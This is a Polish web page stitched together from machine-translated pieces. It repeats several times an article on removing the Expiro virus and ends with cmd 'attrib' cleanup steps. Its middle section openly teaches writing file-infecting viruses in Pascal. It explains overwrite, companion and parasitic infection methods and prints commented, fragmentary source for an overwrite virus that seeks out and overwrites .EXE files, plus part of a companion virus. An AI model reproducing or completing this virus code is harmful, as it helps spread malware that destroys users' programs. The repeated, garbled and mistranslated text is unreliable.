Obecnie wielu użytkowników Internetu „łapie” dość nietypowe wirusy, które atakują pliki wykonywalne i to nawet w taki sposób, że nie wszystkie programy antywirusowe sobie z nimi radzą. Spróbujmy dowiedzieć się, co można zrobić w takiej sytuacji, a jednocześnie rozważmy problem usunięcia wirusa „EXE” z dysku flash.
Sytuacja z przejawem aktywności wirusów tego typu nie jest nowa. To zdarzało się już wcześniej. Najpopularniejszym obecnie szkodnikiem typu trojan komputerowy jest Virus.Win32.Expiro (wersje „w”, „ao”, „bc” itp.).
Możesz go po prostu pobrać w Internecie, a następnie zastanowić się, co z nim zrobić i jak go usunąć. Wirus usuwa pliki EXE, a raczej uniemożliwia ich wykonanie. Nie jest zaskakujące, że przy próbie otwarcia dowolnego programu lub aplikacji, pod wpływem złośliwego kodu wirusa, system nie rozpoznaje pliku wykonywalnego i wyświetla komunikat, że nie znaleziono takiego a takiego pliku.
Co najsmutniejsze, dotyczy to nie tylko zainstalowanych programów, ale pierwszego uruchomienia instalatora (czyli jeśli dystrybucja została pobrana z Internetu i znajduje się na dysku twardym). Jeżeli instalujesz program z nośnika optycznego, wpływ zagrożenia może pojawić się później, po zakończeniu procesu instalacji. Chyba nie trzeba dodawać, że gdy rozpoczynamy proces instalacji z dysku USB, wirus automatycznie wskakuje na niego i infekuje wszystkie pliki z rozszerzeniem .exe.
Ale skutki wirusa można rozpoznać dopiero wtedy, gdy się zacznie plik wykonywalny. Dlatego do momentu uruchomienia pliku niektóre pakiety antywirusowe nie identyfikują zagrożeń, a obecność wirusa w ogóle nie jest wykrywana.
Zobaczmy, co i jak usunąć. Wirus usuwa lub blokuje pliki EXE, w w tym przypadku nie ma znaczenia. Jednak i tu, jak się okazuje, miecz jest obosieczny. Z jednej strony mamy do czynienia z blokowaniem plików przez samego wirusa, z drugiej strony programy antywirusowe nieprawidłowo reagują.
Na przykład obecnie istnieje wiele przypadków, w których ten sam pakiet Avast nadal wykrywa wirusa po skanowaniu określonym przez użytkownika (a nie po początkowej penetracji zagrożenia). Co prawda definicja sprowadza się tylko do tego, że pokazuje zainfekowane pliki EXE i ze względu na niemożność leczenia, masowo je usuwa. Oto sytuacja dla Ciebie. Wydawałoby się, że wszystko jest proste: każdy wie, co i jak usunąć. Wirus sam nawet nie usuwa plików EXE, ale (paradoksalnie!) robi to za pomocą skanera antywirusowego. Naturalnie taki szkodnik jest w stanie tworzyć własne kopie i maskować się nawet jako procesy systemowe wpisz svchost.
Jeśli chodzi o walkę z takim zagrożeniem, nie wszystko jest proste. Przede wszystkim można odradzić większości użytkowników korzystanie z bezpłatnych programów i narzędzi antywirusowych, takich jak Avast, AVG itp. W ostateczności lepiej byłoby mieć w systemie antywirusa chmurowego typu Panda.
Bardzo najlepsza opcja– potężne oprogramowanie antywirusowe firmy Kaspersky Lab lub ESET Corporation. Nawiasem mówiąc, możesz skorzystać z narzędzi takich jak Kaspersky Virus Narzędzie do usuwania, ale najpierw program w postaci wersja przenośna należy nagrać go na dysk optyczny przy użyciu niezainfekowanego komputera i uruchomić z nośnika CD lub DVD.
W przeciwnym razie nie można zagwarantować skutecznego leczenia.
Możesz także użyć małych programów, takich jak CureIt, które faktycznie leczą zainfekowane pliki, a nie je usuwają. Ale ponieważ wirus z reguły „siedzi” w BARAN
najlepszym rozwiązaniem byłoby uruchomienie programów o ogólnej nazwie Rescue Disc z nośników optycznych.
Wniosek
Ogólnie rzecz biorąc, myślę, że kilka wskazówek pomoże większości użytkowników zrozumieć, jak usunąć wirusa. Nie od razu zrozumiesz, czy wirus sam usuwa pliki EXE, czy wykonuje nieautoryzowane blokowanie plików wykonywalnych. Jeśli jednak istnieje choćby najmniejsze podejrzenie jego obecności, zdecydowanie odradza się uruchamianie żadnego programu do czasu zakończenia pełnego procesu skanowania, leczenia plików i usuwania zagrożenia. Między innymi wskazane jest posiadanie jakiegoś pakietu, zdolne zapobiec penetracji zagrożenia na wczesnym etapie.
Obecnie wielu użytkowników Internetu „łapie” dość nietypowe wirusy, które atakują pliki wykonywalne i to nawet w taki sposób, że nie wszystkie programy antywirusowe sobie z nimi radzą. Spróbujmy dowiedzieć się, co można zrobić w takiej sytuacji, a jednocześnie rozważmy problem usunięcia wirusa „EXE” z dysku flash.
Sytuacja z przejawem aktywności wirusów tego typu nie jest nowa. To zdarzało się już wcześniej. Najpopularniejszym obecnie szkodnikiem typu trojan komputerowy jest Virus.Win32.Expiro (wersje „w”, „ao”, „bc” itp.).
Możesz go po prostu pobrać w Internecie, a następnie zastanowić się, co z nim zrobić i plikami EXE, a raczej uniemożliwić ich wykonanie. Nie jest zaskakujące, że przy próbie otwarcia dowolnego programu lub aplikacji, pod wpływem złośliwego kodu wirusa, system nie rozpoznaje pliku wykonywalnego i wyświetla komunikat, że nie znaleziono takiego a takiego pliku.
Co najsmutniejsze, dotyczy to nie tylko zainstalowanych programów, ale pierwszego uruchomienia instalatora (czyli jeśli dystrybucja została pobrana z Internetu i znajduje się na dysku twardym). Jeżeli instalujesz program z nośnika optycznego, wpływ zagrożenia może pojawić się później, po zakończeniu procesu instalacji. Chyba nie trzeba dodawać, że gdy rozpoczynamy proces instalacji z dysku USB, wirus automatycznie wskakuje na niego i infekuje wszystkie pliki z rozszerzeniem .exe.
Jednak działanie wirusa można rozpoznać dopiero po uruchomieniu pliku wykonywalnego. Dlatego do momentu uruchomienia pliku niektóre pakiety antywirusowe nie identyfikują zagrożeń, a obecność wirusa w ogóle nie jest wykrywana.
Zobaczmy, co i jak usunąć. Wirus usuwa pliki EXE lub je blokuje, w tym przypadku nie ma to znaczenia. Jednak i tu, jak się okazuje, miecz jest obosieczny. Z jednej strony mamy do czynienia z blokowaniem plików przez samego wirusa, z drugiej strony z nieprawidłową reakcją programów antywirusowych.
Na przykład obecnie istnieje wiele przypadków, w których ten sam pakiet Avast nadal wykrywa wirusa po skanowaniu określonym przez użytkownika (a nie po początkowej penetracji zagrożenia). Co prawda definicja sprowadza się tylko do tego, że pokazuje zainfekowane pliki EXE i ze względu na niemożność leczenia, masowo je usuwa. Oto sytuacja dla Ciebie. Wydawałoby się, że wszystko jest proste: każdy wie, co i jak usunąć. Wirus sam nawet nie usuwa plików EXE, ale (paradoksalnie!) robi to ręcznie. Naturalnie szkodnik taki potrafi tworzyć własne kopie i podszywać się nawet pod procesy systemowe, takie jak svchost.
Jeśli chodzi o walkę z takim zagrożeniem, nie wszystko jest proste. Przede wszystkim można odradzić większości użytkowników korzystanie z bezpłatnych programów i narzędzi antywirusowych, takich jak Avast, AVG itp. W ostateczności lepiej byłoby mieć w systemie antywirusa chmurowego typu Panda.
Najlepszą opcją jest potężne oprogramowanie antywirusowe firmy Kaspersky Lab lub ESET Corporation. Nawiasem mówiąc, możesz skorzystać z usług narzędzi takich jak Kaspersky Virus Removal Tool, tylko najpierw program w wersji przenośnej musi zostać nagrany na niezainfekowanym komputerze i uruchomiony z nośnika CD lub DVD. W przeciwnym razie nie można zagwarantować skutecznego leczenia.
W przeciwnym razie nie można zagwarantować skutecznego leczenia.
Ponieważ jednak wirus z reguły „siedzi” w pamięci RAM, najbardziej optymalnym rozwiązaniem byłoby użycie programów o ogólnej nazwie Rescue Disc do uruchomienia z nośników optycznych.
Sprawdzają wszystkie elementy systemu jeszcze przed jego uruchomieniem. W większości przypadków ta metoda jest skuteczna. Nawiasem mówiąc, ta technika jest również odpowiednia dla dysków flash, tylko w parametrach skanowania urządzeń pamięci masowej należy dodatkowo zaznaczyć pole napędu USB.
Ogólnie rzecz biorąc, myślę, że niektóre wskazówki pomogą większości użytkowników zrozumieć, czy pliki EXE same w sobie są wirusem, czy też blokują pliki wykonywalne bez pozwolenia, czego nie od razu zrozumiesz; Jeśli jednak istnieje choćby najmniejsze podejrzenie jego obecności, zdecydowanie odradza się uruchamianie żadnego programu do czasu zakończenia pełnego procesu skanowania, leczenia plików i usuwania zagrożenia.
Między innymi wskazane jest posiadanie w systemie jakiegoś pakietu Internet Security, który może zapobiec przenikaniu zagrożeń na początkowym etapie.
Obecnie większość użytkowników Internetu staje przed problemem, gdy ich komputer zostaje zainfekowany nietypowymi wirusami, które mają negatywny wpływ na pliki wykonywalne. Ponadto nie wszystkie programy antywirusowe są w stanie sobie z nimi poradzić.
Problem z działaniem wirusów tego typu nie jest nowy. Najpopularniejszym obecnie szkodnikiem typu trojan komputerowy jest Virus.Win32.Expiro. Złapanie go w Internecie nie jest takie trudne, znacznie trudniej jest później pozbyć się szkodnika. Ten wirus możliwość usuwania plików EXE. Dokładniej, czyni je niedostępnymi dla użytkownika. Dlatego też, gdy próbujesz otworzyć określony program po wystawieniu na działanie złośliwego kodu wirusa, plik wykonywalny nie jest rozpoznawany przez system. W rezultacie na ekranie pojawia się komunikat informujący, że żądany obiekt nie został odnaleziony. Warto zaznaczyć, że dotyczy to nie tylko zainstalowane programy, ale także do pierwszego uruchomienia instalatora. Mówimy o pakiecie dystrybucyjnym pobranym z Internetu i umieszczonym na dysku twardym.
Jeżeli zainstalujesz program z nośnika optycznego, wpływ zagrożenia może pojawić się później, gdy proces ten się zakończy. Jak wiadomo, wirus instalowany z dysku USB automatycznie na niego przeskakuje, infekując wszystkie pliki posiadające rozszerzenie .exe. Jednak działanie wirusa można rozpoznać dopiero po uruchomieniu pliku wykonywalnego. Dlatego do czasu przeprowadzenia tego procesu większość pakiety antywirusowe zagrożenia nie są identyfikowane. Co więcej, obecność wirusa w ogóle nie jest wykrywana.
Problemy z oprogramowaniem antywirusowym
Warto zastanowić się bardziej szczegółowo, co i w jaki sposób można usunąć. Wirus potrafi pozbyć się plików EXE lub je zablokować. To nie jest takie ważne. W obu przypadkach jest to miecz obosieczny. Jak wiadomo, problem polega na tym, że pliki są blokowane przez samego wirusa. Naraz, o czym mówimy o nieprawidłowej reakcji programów antywirusowych. Na przykład obecnie istnieje wiele przypadków, w których pakiet Avast lub inny program antywirusowy wykrywa wirusa podczas skanowania określonego przez użytkownika.
Jednak wynik ten proces Sprowadza się to tylko do tego, że program pokazuje zainfekowane pliki EXE. Kiedy nie da się ich wyleczyć, sama je usuwa bez ostrzeżenia. Dlatego warto powiedzieć, że wirus nie usuwa sam plików EXE, ale robi to za pomocą skanera antywirusowego. Należy zauważyć, że prezentowany szkodnik potrafi tworzyć kopie, a nawet podszywać się pod procesy systemowe, takie jak svchost.
Procedura usuwania wirusa z zainfekowanych plików EXE Jeśli weźmiemy pod uwagę walkę z takim zagrożeniem, wszystko nie jest tak proste, jak mogłoby się wydawać na pierwszy rzut oka. Po pierwsze, wskazane jest zaprzestanie korzystania z bezpłatnych programów antywirusowych, takich jak Avast, AVG i inne. Idealna opcja będzie obecność w systemie programu antywirusowego w chmurze, takiego jak Panda. Zalecane jest używanie potężnego programu antywirusowego oprogramowanie Kaspersky Lab lub ESET. Ponadto możesz korzystać z usług narzędzi takich jak Kaspersky Virus Removal Tool, ale najpierw należy zapisać program nośniki optyczne jako wersja przenośna. W tym celu wykorzystywany jest niezainfekowany komputer, a uruchomienie odbywa się z płyty CD lub DVD.
Jeśli te zalecenia nie będą przestrzegane, trudno zagwarantować skuteczne leczenie. Ponadto możesz użyć więcej proste programy jak CureIt. Ich działanie ma na celu w szczególności leczenie zainfekowanych plików, a nie ich usuwanie. Ponieważ wirus zwykle znajduje się w pamięci RAM, właściwym rozwiązaniem byłoby uruchomienie z niego dysk optyczny programy znane pod wspólną nazwą Rescue Disc. Są w stanie sprawdzić wszystkie elementy systemu przed uruchomieniem. Bardzo często ta metoda staje się skuteczna. Warto zauważyć, że ta technika jest optymalnie odpowiednia dla dysków flash. Jednak w tym przypadku w ustawieniach skanowania urządzeń pamięci masowej należy dodatkowo ustawić checkbox na dysku USB.
Mamy nadzieję, że te zalecenia będą przydatne dla większości użytkowników. Pomogą użytkownikom rozwiązać problem usunięcia wirusa. Jeśli istnieje choćby najmniejsze podejrzenie jego obecności, niepożądane jest uruchamianie jakiegokolwiek programu do czasu zakończenia całego procesu. Zaleca się także zakup jakiegoś pakietu, takiego jak Internet Security, który może początkowo zapobiec wpływowi zagrożenia scena.
W tym artykule mowa o wirusy, zarażanie Pliki EXE. Klasyfikacja takich wirusy szczegółowo omówiono algorytmy ich działania, różnice między nimi, zalety i wady.
Wirusy- to dobra gimnastyka dla umysłu, chociaż wiele osób zastanawia się, co napisać wirus w języku wysoki poziom bardzo trudne. Nie jest to do końca prawdą. Napisz do Język pascalowy dość łatwo, chociaż rozmiar powstałego kodu jest imponujący.
Dla każdego typu wirusy Podano także teksty źródłowe ze szczegółowymi komentarzami, podstawowe informacje o budowie i zasadach działania programy EXE.
pliki COM(małe programy napisane głównie w języku asemblera) powoli, ale z pewnością stają się przestarzałe. Zastępują je te, które przerażają swoją wielkością. EXE-„potwory”. Pojawiły się także wirusy, które mogą zarażać Pliki EXE.
Struktura i proces ładowania programu EXE
Inaczej programy COM,programy EXE może składać się z kilku segmentów (kod, dane, stos). Mogą zająć ponad 64 KB. plik EXE posiada nagłówek, który jest używany podczas ładowania. Nagłówek składa się ze sformatowanej części zawierającej podpis i dane potrzebne do załadowania plik EXE i tabele do ustawiania adresów ( Tabela relokacji). Tabela składa się z wartości w formacie segment:offset. Po załadowaniu programu do pamięci należy dodać adres segmentu, z którego program został załadowany, do przesunięć w module ładującym wskazanych wartościami z tabeli.
Podczas uruchamiania programy EXE Program ładujący system (wywołujący funkcję DOS 4Bh) wykonuje następujące akcje:
1. Określ adres segmentu wolnego obszaru pamięci i rozmiar
co wystarczy do hostowania programu.
2. Tworzony i wypełniany jest blok pamięci dla zmiennych środowiskowych.
3. Tworzony jest blok pamięci dla PSP i programu (segment YOOOO - PSP;
segment + OOOYOOOOOO - program).
Odpowiednie wartości są wprowadzane w pola PSP.
4. Adres DTA jest ustawiony na PSP:0080h.
5. Sformatowana część jest wczytywana do obszaru roboczego ładowarki
chodnikowiec plik EXE.
6. Długość modułu obciążającego oblicza się ze wzoru:
Si7.e=((PageCnt*5i2)-(HdrSae*i6))-Pa!tP3ig.
7.Wyznacza się offset modułu ładującego w pliku, równy
8. Obliczany jest adres segmentu (START_SEG) do ładowania - zwykle jest to PSP+1Oh.
9. Moduł startowy zostaje wczytany do pamięci (zaczynając od adresu
START_SEG:0000).
10. Dla każdego wpisu w tabeli ustawień:
a) czyta się słowa I_OFF i I_SEG;
b) Obliczana jest RELC^SEG-START^SEG+LSEG;
c) odczytywane jest słowo pod adresem RELO_SEG:I_OFF;
d) Do słowa czytanego dodawany jest START_SEG;
e) wynik zapisywany jest pod tym samym adresem (RELO_SEG:I_OFF).
11. Pamięć dla programu przydzielana jest zgodnie z MaxMet
12. Rejestry są inicjowane, program jest wykonywany:
b) AX = wynik sprawdzenia poprawności identyfikatorów sterowników podanych w linii poleceń;
c)SS°START_SEG+ReloSS, SP-ExeSP;
d)CS=START_SEG+ReloCS, IP=ExeIP.
Klasyfikacja wirusów EXE
wirusy EXE można warunkowo podzielić na grupy wykorzystując cechy algorytmu jako znak podziału. WirusyPrzepisać) Taki wirusy stały się już rzadkością. Ich główną wadą jest to, że są zbyt szorstkie. Zainfekowane programy nie są uruchamiane, ponieważ wirus jest zapisywany w kodzie programu bez jego zapisywania. Podczas uruchamiania wirus szuka kolejnej ofiary (lub ofiar), otwiera znaleziony plik do edycji i zapisuje jego treść na początku programu, bez zapisywania oryginalnego kodu. Zarażony tymi wirusy programy nie podlegają leczeniu.
Wirusy towarzyszące
Te wirusy swoją nazwę zawdzięczają algorytmowi reprodukcji:
Dla każdego zainfekowanego pliku tworzony jest plik satelitarny. Przyjrzyjmy się bliżej dwóm typom wirusów z tej grupy:
Wirusy pierwszy typ odtwarza się w następujący sposób. Dla każdej zakażonej osoby plik EXE w tym samym katalogu tworzony jest plik z kodem wirusa, mający taką samą nazwę jak plik EXE, ale z rozszerzeniem KOM. Wirus aktywowane, jeśli podczas uruchamiania programu w wierszu poleceń zostanie podana tylko nazwa pliku wykonywalnego. Chodzi o to, że jeśli nie określono rozszerzenia pliku, DOS-u najpierw wyszukuje w bieżącym katalogu plik o podanej nazwie i rozszerzeniu KOM. Jeśli plik COM o tej nazwie nie odnaleziono, trwają poszukiwania o tej samej nazwie plik EXE. Jeśli nie znaleziono i plik EXE, DOS spróbuje wykryć KADŹ(wsadowy) plik. Jeśli w bieżącym katalogu nie ma pliku wykonywalnego z określona nazwa wyszukiwanie odbywa się we wszystkich katalogach dostępnych dla zmiennej ŚCIEŻKA. Innymi słowy, gdy użytkownik chce uruchomić program i wpisuje tylko jego nazwę w wierszu poleceń (przeważnie wszyscy tak robią), pierwszy przejmuje kontrolę wirus, którego kod jest w plik COM. On tworzy plik COM do jednego lub więcej Pliki EXE(rozprzestrzenia się), a następnie wykonuje plik EXE z nazwą podaną w wierszu poleceń. Użytkownik myśli, że działa tylko ten uruchomiony programu EXE.
Zneutralizuj wirusa satelitarnego całkiem proste - po prostu usuń
plik COM.
Wirusy drugi typ działa bardziej subtelnie. Imię i nazwisko zakażonej osoby
plik EXE pozostaje taki sam, a rozszerzenie jest zastępowane przez niektóre
inny niż ten wykonywany ( COM, EXE i BAT), Na przykład,
plik może otrzymać rozszerzenie DATA(plik danych) lub OVL(zawodowiec-
nakładka gramowa). Następnie na miejsce plik EXE skopiowane wirusowy kod. Po uruchomieniu takiego zainfekowanego programu kontrolę przejmuje: wirusowy kod znajdujący się w plik EXE. Infekując jednego lub więcej Pliki EXE w ten sam sposób wirus zwraca rozszerzenie pliku wykonywalnego oryginalnego pliku (ale nie E ON i KOM, ponieważ plik EXE o tej nazwie jest zajęty przez wirusa), po czym go uruchamia. Po zakończeniu działania zainfekowanego programu jego plik wykonywalny zostaje przywrócony do niewykonywalnego rozszerzenia. Dezynfekcja plików zakażenie tego typu wirusem może być trudne, jeśli wirus-Sputnik szyfruje część lub całość zainfekowanego pliku i odszyfrowuje go przed wykonaniem.
Wirusy, osadzony w programie (pasożytniczy) Wirusy tego typu są najbardziej niepozorne: ich kod jest zapisywany w zainfekowanym programie, co jest niezbędne utrudnia leczenie zainfekowane pliki. Rozważmy metody wdrażania Wirusy EXE w pliku EXE.
Sposoby infekowania plików EXE
Najczęstsza metoda infekcji Pliki EXE w ten sposób: treść jest dodawana na końcu pliku wirus, a nagłówek jest dostosowywany (zachowując oryginał), tak aby po uruchomieniu zainfekowanego pliku przejęto kontrolę wirus. Wygląda na infekcję pliki COM, ale zamiast ustawiać kod, aby przejść na początek wirusa, poprawiany jest rzeczywisty adres punktu uruchomienia programu. Po zakończeniu pracy wirus pobiera z zapisanego nagłówka oryginalny adres uruchomienia programu, dodaje wartość rejestru DS lub ES (uzyskaną podczas uruchamiania wirusa) do swojego komponentu segmentowego i przekazuje kontrolę na otrzymany adres.
Następna metoda - wstrzyknięcie wirusa na początek pliku ze zmianą kodu
programy. Mechanizm infekcji jest następujący: ciało zainfekowany program wczytane do pamięci, zapisane na swoim miejscu kod wirusa, a po nim - kod zainfekowane programy S. W ten sposób kod programu jest niejako „przesunięty” w pliku o długość kodu wirusa. Stąd nazwa metody – „metoda przesunięcia”. Podczas uruchamiania zainfekowanego pliku wirus infekuje jeden lub więcej plików. Następnie wczytuje kod programu do pamięci i zapisuje go do specjalnie utworzonego pliku tymczasowego na dysku z rozszerzeniem pliku wykonywalnego ( COM lub EXE), a następnie wykonuje ten plik. Po zakończeniu działania programu plik tymczasowy zostanie usunięty. Jeżeli podczas tworzenia wirusa nie zastosowano żadnych dodatkowych technik ochrony, wyleczenie zainfekowanego pliku jest bardzo proste - wystarczy usunąć kod wirusa z początku pliku, a program znów będzie działał. Wadą tej metody jest to, że konieczne jest wczytanie do pamięci całego kodu zainfekowanego programu (a zdarzają się przypadki o rozmiarze większym niż 1 MB).
Następny sposób infekowania plików - metoda transferu - najwyraźniej jest najbardziej zaawansowana ze wszystkich wymienionych. Wirus odtwarza się w następujący sposób: po uruchomieniu zainfekowanego programu ciało wirus odczytać z niego do pamięci. Następnie przeprowadzane jest wyszukiwanie niezainfekowanego programu. Jego początek, równy długości ciała, jest wczytywany do pamięci wirus. W tym miejscu zarejestrowano ciało wirus.Początek programu z pamięci jest dodawany na końcu pliku. Stąd nazwa metody – „metoda transferu”. Po wirus zainfekował jeden lub więcej plików, rozpoczyna wykonywanie programu, z którego został uruchomiony. W tym celu odczytuje początek zainfekowanego programu zapisany na końcu pliku i zapisuje go na początku pliku, przywracając funkcjonalność programu. Następnie wirus usuwa kod startowy z końca pliku, przywracając pierwotną długość pliku i uruchamia program. Po zakończeniu programu wirus ponownie zapisuje swój kod na początku pliku, a oryginalny początek programu na końcu. Nawet programy antywirusowe, które sprawdzają integralność swojego kodu od momentu uruchomienia wirus program ma dokładnie taki sam kod jak przed infekcją.
Wirusy, zastępując kod programu ( Przepisać) Jak już wspomniano, ten gatunek wirusy nie żyje od dawna. Czasem zdarzają się też takie wirusy stworzony w języku Asembler, ale napisanie najmniejszego to raczej rywalizacja nadpisać wirusa. NA w tej chwili najmniejszy znany nadpisać wirusy pisemny Przypomnienie (grupa załogi Death Virii) i zajmuje 22 bajty.
Algorytm działania wirusa nadpisującego jest następujący:
1. Otwórz plik, z którego wirus przejął kontrolę.
3. Zamknij plik.
4. Wyszukaj według maski plik odpowiedni do infekcji.
5. Jeśli nie znaleziono więcej plików, przejdź do kroku 11.
6. Otwórz znaleziony plik.
7. Sprawdź, czy znaleziony plik jest zainfekowany tym wirusem.
8. Jeżeli plik jest zainfekowany przejdź do kroku 10.
9. Wpisz kod wirusa na początku pliku.
10. Zamknij plik (w razie potrzeby możesz zainfekować jeden do wszystkich plików)
wędkowanie w katalogu lub na dysku).
11. Wyświetl na ekranie komunikat o błędzie, na przykład „Nieprawidłowe zakończenie programu” lub „ Nie wystarczy memory” - niech użytkownik nie będzie zbyt zdziwiony, że program się nie uruchomił.
12. Zakończ program.
Poniżej znajduje się lista programów, które infekują pliki w ten sposób.
(M 2048 USD, 0, 0)
(Wykorzystuje moduły DOS i System ( Moduł systemowy automatycznie łączy się z każdym programem podczas kompilacji))
(Nazwa wirusa)
VirName='Ból';
(Linia w celu sprawdzenia ponownej infekcji.
Jest on dodawany do zainfekowanego pliku bezpośrednio po kodzie wirus}
VirLabel: String=’Ból!1;
(Długość wynikowej kompilacji plik EXE}
Author=’Brudny nazista/SGWW.’;
(Liczba plików zainfekowanych podczas jednej sesji)
(Tablica określająca, czy istnieje kopia wirus w znalezionym pliku)
Virldentifier: Tablica Char;
(Zmienna pliku do pracy z plikami)
(Kolejna zmienna pliku - choć dałoby się bez niej obejść, będzie jaśniej)
(Dla nazwy znalezionego pliku)
Plik docelowy:ŚcieżkaStr;
(Bufor ciała wirus)
VirBuf: Tablica [-I.VirLen] Char;
(Data/godzina pliku)
(Licznik liczby zainfekowanych plików)
Dirlnfo:SearchRec;
LabelBuf: Tablica Char;
(Inicjalizacja)
LabelBuf :=VirLabel;
LabelBuf:=VirLabel;
LabelBuf:=VirLabel,
LabelBuf:=VirLabel;
LabelBuf:=VirLabel;
(Zresetuj licznik ilości zainfekowane pliki}
(Kojarzymy zmienną pliku VirBody z nazwą programu, od którego zaczynaliśmy)
Przypisz(VirBody, ParamStr(O));
(Otwórz plik z recsize=1 bajt)
Resetuj(VirBody, 1);
(Czytamy treść z pliku wirus do tablicy VirBuf)
BlockRead(VirBody VirBuf, VirLen);
(Zamknij plik)
(Szukaj ofiary)
procedura FindTarget;
(Funkcja zwraca True, jeśli znaleziony program jest już zainfekowany, i False, jeśli jeszcze nie jest)
funkcja VirusPresent: Boolean;
VirusPresent:=Fałsz;
(Otwórz znaleziony plik)
Przypisz (cel, plik docelowy);
Resetuj (cel, 1);
(Przechodzimy do długości ciała wirus od początku pliku)
Szukaj(Cel, VirLen);
(Odczytujemy 5 bajtów - jeśli plik jest już zainfekowany, pojawia się etykieta wirus}
BlockRead(Target, Virldentifier, 5);
Jeśli Virlidentifier=Virl_abel Wtedy
(Jeśli jest znak, to jest wirus}
VirusPresent:=True;
(Procedura infekcji)
procedura InfectFile;
(Jeśli rozmiar znalezionego pliku jest mniejszy niż długość wirusa plus 100 bajtów, zakończ procedurę)
Jeśli Sr.Rozmiar< VirLen+100 Then Exit;
Jeśli znaleziony program nie jest jeszcze zainfekowany, infekujemy go)
Jeśli nie ma wirusa, to wtedy
(Zapamiętajmy datę i godzinę pliku. Nie ma potrzeby zapamiętywania atrybutów, gdyż wyszukiwanie odbywa się wśród plików z atrybutem Archiwum, a atrybut ten i tak jest umieszczany na pliku po zapisaniu)
(Otwarty na infekcję)
Przypisz (cel, plik docelowy);
Resetuj (cel, 1);
(Zapisuje ciało wirus na początek pliku)
BlockWrite(Cel, VirBuf, VirLen);
(Przesuń wskaźnik bieżącej pozycji na długość wirus od początku pliku)
Szukaj(Cel, VirLen);
(Wprowadź etykietę infekcji)
BlockWrite(Cel, LabelBuf, 5);
(Ustaw datę i godzinę pliku)
SetFTime(Cel, czas);
(Zamknięcie)
(Zwiększ licznik zainfekowane pliki}
(Rozpocznij procedurę FindTarget)
(Szukamy plików w bieżącym katalogu za pomocą maski * .EXE
z atrybutami Archiwum}
FindFirstF.EXE”, Archiwum, senior);
(O ile istnieją pliki do zainfekowania)
Podczas gdy DosError=0 Zrób
Jeśli Sr.Name=”Następnie wyjdź;
(Pamiętamy nazwę znalezionego pliku w zmiennej TargetFile)
TargetFile:=Sr.Nazwa;
(Wywołaj procedurę infekcji)
(Jeśli zainfekowane zostały pliki InfCount, zakończ wyszukiwanie)
Jeśli InfFiles > InfCount, następnie wyjdź;
(Szukamy następnego pliku według maski)
(Główny korpus)
(Inicjowanie)
(Szukamy ofiar i zakażamy je)
(Wyświetlamy komunikat o błędzie na ekranie)
WriteLn(‚Nieprawidłowe zakończenie programu.’);
(To jest dla kompilatora wstawienie stałych VirName i Author do kodu, ale warunek jest ustawiony w taki sposób, że te linie nigdy nie będą wyświetlane na ekranie)
WriteLn(Nazwa Vir);
WriteLn(Autor);
Wirusy towarzyszące
Wirusy satelitarne obecnie szeroko rozpowszechniony - stosunek towarzysza do pasożyta wirusy około jedna na dwie infekcje metodą tworzenia plik COM satelita Znaczenie tej metody polega na tym, aby nie dotykać „obcego kota” ( programu EXE), stwórz „własny” - plik COM z imieniem programy EXE. Algorytm do tego wirus jest niezwykle proste, ponieważ nie ma potrzeby wykonywania niepotrzebnych działań (na przykład zapisywania długości skompilowanego plik EXE Z kod wirusa, wczytując do bufora treści wirus, uruchom plik, z którego wirus otrzymał kontrolę). Nie ma nawet potrzeby przechowywania znacznika, aby określić, czy plik jest zainfekowany.
Infekcja odbywa się za pomocą procesora poleceń:
1. Jeśli w wierszu poleceń podano parametry, zapisz je w zmiennej typu String w celu przesłania do zainfekowanego programu.
2. Znajdź plik EXE-ofiara.
3.Sprawdź, czy znaleziony plik znajduje się w katalogu plik EXE plik COM o tej samej nazwie co plik ofiary.
4.Jeśli tak plik COM jest obecny, plik jest już zainfekowany, przejdź
do punktu 6.
5.Korzystając z procesora poleceń skopiuj plik z którego
kontrola została odebrana, do pliku z nazwiskiem i rozszerzeniem ofiary KOM.
6. Procedura Byli załaduj i wykonaj plik o nazwie pliku początkowego, ale z rozszerzeniem EXE- to znaczy uruchom zainfekowany program.
7. Wróć do DOS-u.
Poniższa lista przedstawia zainfekowane pliki
(M 2048 USD, 0, 0)
(Wykorzystywane są moduły DOS i System (automatycznie moduł System
łączy się z każdym programem podczas kompilacji))
(Nazwa wirusa)
VirName='Guesf;
Autor='Brudny nazista/SGWW. Tylko 4 PVT!”;
(Ilość zainfekowany na jedną sesję plików roboczych)
(Dla nazwy znalezionego pliku)
Plik docelowy:ŚcieżkaStr;
To nie jest trudne. Zacznijmy!
Jak samodzielnie usunąć wirusa
Konieczne jest działanie z uprawnieniami administratora.
Najpierw musisz otworzyć wiersz poleceń. Aby to zrobić, naciśnij skrót klawiaturowy WINDOWS+R i w wyświetlonym oknie wpisz w wierszu cmd i naciśnij OK .
polecenie cmd w wierszu poleceń
Lub klikając przycisk Start w lewym dolnym rogu ekranu monitora, w pasku wyszukiwania zacznij wpisywać „ wiersz poleceń", a następnie kliknij znaleziony wynik kliknij prawym przyciskiem myszy myszką i wybierz „ Uruchom jako administrator».
Wywoływanie wiersza poleceń poprzez wyszukiwanie
Uruchom Wiersz Poleceń jako Administrator
Krótko o celach naszych przyszłych działań:
Korzystanie z polecenia atrybut musisz znaleźć pliki, które nie powinien znajdować się wśród plików systemowych i dlatego może budzić wątpliwości.
Ogólnie rzecz biorąc, w C:/dysk nie powinien zawierać żadnego .exe Lub .inf akta. I w folderze C:\Windows\System32 nie powinien również zawierać żadnych plików innych niż systemowe, ukryte lub tylko do odczytu z atrybutami i, e S H R.
Otwórz wiersz poleceń i wklej cmd. Uruchom ten plik jako administrator.
Otwór cmd
Piszemy w wierszu płyta CD/ aby uzyskać dostęp do dysku. Następnie wprowadź polecenie atrybut. Po każdym poleceniu nie zapomnij nacisnąć ENTER:
Zespół atrybut w wierszu poleceń
Jak widać na ostatnim zdjęciu, pliki z rozszerzeniami .exe Lub .inf nie znaleziono.
Wirusy w Windowsie
Dysk C nie zawiera żadnych plików .exe i.inf, Do widzenia nie pobierzesz tych plików ręcznie. Jeśli znajdziesz jakiś plik podobny do tych, które znaleźliśmy i wyświetli się S. H. R wtedy mogłoby być wirus.
Tutaj znaleźliśmy 2 takie pliki:
autorun.inf
sscv.exe
Pliki te mają rozszerzenia .exe i. inf i mają atrybutyS H R . Oznacza to, że te pliki mogą być wirusy .
Teraz wybierz numer atrybut -s -h -g -a -i nazwa pliku.rozszerzenie. Lub w naszym przykładzie to:
atrybut —S-H -G -a-i autorun.inf
To polecenie zmieni ich właściwości, czyniąc je zwykłymi plikami. Następnie można je usunąć.
